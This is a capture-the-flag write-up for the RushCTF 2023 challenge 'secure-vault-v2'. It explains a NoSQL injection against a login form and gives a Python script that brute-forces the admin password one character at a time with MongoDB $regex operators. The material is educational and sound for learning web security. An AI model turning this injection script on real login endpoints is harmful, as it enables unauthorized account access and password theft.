🇬🇧 RushCTF 2023 - web/secure-vault-v2
Note
First web challenge from the RushCTF 2023. I liked this challege a lot and I learned a new thing about NoSQL injections. It might just be my favourite one from this CTF.
Description
My SecureVault was Hacked last year. It was because of that damm SQL language, see if you can get my password now! Goodluck
Hint: SAY NO TO …
Recon
Since the description talks about SQL, and the hint tells us to “say no to …” we can assume that we’re going to do NoSQL Injection. Now, the goal si not only to bypass the login, but to get the admin’s password.
Let’s first take a look at the website:
There is not much going around here, just the login form with two inputs, let’s capture the login request and play around with it.
Exploitation
After taking a look at this page, I came up with this payload that allowed me to connect to the page:
But remember, the goal is not to connect, but to get the admin’s password.
Now that we know we can manipulate the NoSQL request, we can use [$regex] on the password and bruteforce each character. Let’s make a python script to automate this.
import requests
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-}"
url = "http://challs.ctf.cafe:9999/login"
# We know the flag is going to look like RUSH{}
flag = "RUSH{"
# Infinite loop
while True:
# Loop through each possible char in the flag
for char in alphabet:
# If the char is the correct one, the response will be a 200 OK
# otherwise, it'll be a 403 forbidden
# We use the $regex to guess wether the character we try is good or not
res = requests.post(url,
json={"username": {"$eq":"admin"}, "password": {"$regex": flag+char+".*"}})
# If it's not 403, it means the current character is the next one in the flag
if not res.status_code == 403:
flag += char
print(char,"is in the flag -- current flag:",flag)
Alright, let’s test it (took about 5 minutes):
And it worked! GG !
Conclusion
That is the end of this very nice, beginner-friendly CTF. I enjoyed it a lot and learned some new things.
